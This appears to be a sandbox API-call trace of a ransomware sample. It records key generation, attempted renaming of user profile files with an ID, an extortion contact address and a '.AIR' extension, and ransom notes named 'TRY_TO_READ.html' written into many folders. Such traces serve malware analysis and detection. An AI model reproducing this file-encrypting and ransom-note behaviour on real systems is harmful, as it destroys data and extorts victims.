	[0053.094] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0053.094] GetProcessHeap () returned 0x540000
	[0053.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0d8 | out: hHeap=0x540000) returned 1
	[0053.094] CloseHandle (hObject=0xffffffff) returned 0
	[0053.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b368 | out: hHeap=0x540000) returned 1
	[0053.094] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5d9290
	[0053.094] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8250
	[0053.094] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967a0
	[0053.094] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8250 | out: pbBuffer=0x5b8250) returned 1
	[0053.094] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967a0 | out: pbBuffer=0x5967a0) returned 1
	[0053.094] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", dwFileAttributes=0x80) returned 1
	[0053.094] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 46
	[0053.094] GetProcessHeap () returned 0x540000
	[0053.094] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc2) returned 0x5da0d8
	[0053.094] lstrcpyW (in: lpString1=0x5da0d8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1"
	[0053.094] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.094] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0053.094] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0053.094] GetProcessHeap () returned 0x540000
	[0053.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0d8 | out: hHeap=0x540000) returned 1
	[0053.094] CloseHandle (hObject=0xffffffff) returned 0
	[0053.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0053.094] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5d9290
	[0053.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8358
	[0053.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967b0
	[0053.095] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8358 | out: pbBuffer=0x5b8358) returned 1
	[0053.095] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967b0 | out: pbBuffer=0x5967b0) returned 1
	[0053.095] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", dwFileAttributes=0x80) returned 1
	[0053.095] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 41
	[0053.095] GetProcessHeap () returned 0x540000
	[0053.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb8) returned 0x5a2048
	[0053.095] lstrcpyW (in: lpString1=0x5a2048, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT"
	[0053.095] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.095] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0053.095] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0053.095] GetProcessHeap () returned 0x540000
	[0053.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a2048 | out: hHeap=0x540000) returned 1
	[0053.095] CloseHandle (hObject=0xffffffff) returned 0
	[0053.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x591a38 | out: hHeap=0x540000) returned 1
	[0053.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0053.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0053.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0053.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e68 | out: hHeap=0x540000) returned 1
	[0053.095] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9d6ecd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d6ecd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575860
	[0053.096] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.096] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.096] GetLastError () returned 0x6
	[0053.096] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9d6ecd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d6ecd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0053.096] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.096] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.096] GetLastError () returned 0x6
	[0053.096] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1
	[0053.096] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.096] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.096] GetLastError () returned 0x6
	[0053.096] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.096] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.097] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.097] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.097] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.097] CloseHandle (hObject=0x454) returned 1
	[0053.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0053.098] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1
	[0053.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.098] GetLastError () returned 0x0
	[0053.098] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Application Data\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\application data\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.099] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x591a38 | out: hHeap=0x540000) returned 1
	[0053.099] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.100] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.100] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.100] CloseHandle (hObject=0x454) returned 1
	[0053.100] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.100] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.100] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.100] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58bb50 | out: hHeap=0x540000) returned 1
	[0053.100] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
	[0053.100] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.100] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.100] GetLastError () returned 0xb7
	[0053.100] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Desktop\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\desktop\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.101] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.101] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.102] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.102] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.102] CloseHandle (hObject=0x454) returned 1
	[0053.102] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.102] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0053.103] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0053.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.103] GetLastError () returned 0x0
	[0053.103] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.103] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.104] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.104] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.104] CloseHandle (hObject=0x454) returned 1
	[0053.105] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.105] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.105] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.105] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0053.105] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1
	[0053.105] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.105] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.105] GetLastError () returned 0x0
	[0053.105] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Favorites\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\favorites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.105] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.105] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.106] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.106] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.106] CloseHandle (hObject=0x454) returned 1
	[0053.107] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.107] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.107] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.107] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5847c8 | out: hHeap=0x540000) returned 1
	[0053.107] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1
	[0053.107] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.107] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.107] GetLastError () returned 0x0
	[0053.107] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1
	[0053.107] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.107] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.107] GetLastError () returned 0x0
	[0053.107] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\microsoft help\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
	[0053.109] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x591a38 | out: hHeap=0x540000) returned 1
	[0053.109] WriteFile (in: hFile=0x454, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.110] WriteFile (in: hFile=0x454, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.110] WriteFile (in: hFile=0x454, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.110] CloseHandle (hObject=0x454) returned 1
	[0053.110] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.110] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.111] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.111] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58bba8 | out: hHeap=0x540000) returned 1
	[0053.111] FindNextFileW (in: hFindFile=0x575860, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1
	[0053.111] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.111] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.111] GetLastError () returned 0x0
	[0053.111] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Mozilla\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\mozilla\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454
